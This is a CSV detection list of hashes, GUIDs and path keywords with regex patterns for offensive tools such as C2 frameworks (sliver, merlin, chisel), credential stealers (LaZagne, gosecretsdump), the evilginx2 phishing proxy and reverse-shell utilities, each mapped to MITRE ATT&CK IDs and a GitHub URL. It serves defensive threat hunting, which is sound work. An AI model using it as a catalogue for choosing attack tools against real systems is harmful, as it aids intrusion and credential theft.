"*b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451*",".{0,1000}b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453*",".{0,1000}b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*b18aca1b9e2a9e72cb77960c355d288b*",".{0,1000}b18aca1b9e2a9e72cb77960c355d288b.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*b18d778b4e4b6bf1fd5b2d790c941270145a6a6d*",".{0,1000}b18d778b4e4b6bf1fd5b2d790c941270145a6a6d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865*",".{0,1000}b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650*",".{0,1000}b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa*",".{0,1000}b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B1CB9A30-FEA6-4467-BEC5-4803CCE9BF78*",".{0,1000}B1CB9A30\-FEA6\-4467\-BEC5\-4803CCE9BF78.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67*",".{0,1000}b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e*",".{0,1000}b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd*",".{0,1000}b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb*",".{0,1000}b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401*",".{0,1000}b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*",".{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","0","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241*",".{0,1000}b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/rsocx*",".{0,1000}b23r0\/rsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b*",".{0,1000}b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d*",".{0,1000}b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59*",".{0,1000}b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd*",".{0,1000}b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B2924789-9912-4B6F-8F7B-53240AC3BA0E*",".{0,1000}B2924789\-9912\-4B6F\-8F7B\-53240AC3BA0E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e*",".{0,1000}b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*b2xtranslator.xls.csproj*",".{0,1000}b2xtranslator\.xls\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc*",".{0,1000}b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*B374K*index.php*",".{0,1000}B374K.{0,1000}index\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*b37eeeceb6addc2243bca9c408ee13554726772d*",".{0,1000}b37eeeceb6addc2243bca9c408ee13554726772d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82*",".{0,1000}b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6*",".{0,1000}b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3*",".{0,1000}b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2*",".{0,1000}b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d*",".{0,1000}b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63*",".{0,1000}b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34*",".{0,1000}b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*b3rito*yodo*",".{0,1000}b3rito.{0,1000}yodo.{0,1000}","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. ","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z" "*b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea*",".{0,1000}b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113*",".{0,1000}b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a*",".{0,1000}b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52*",".{0,1000}b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","file_hash","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*",".{0,1000}B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09*",".{0,1000}b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b*",".{0,1000}b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*",".{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896*",".{0,1000}b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd*",".{0,1000}b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0*",".{0,1000}b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - 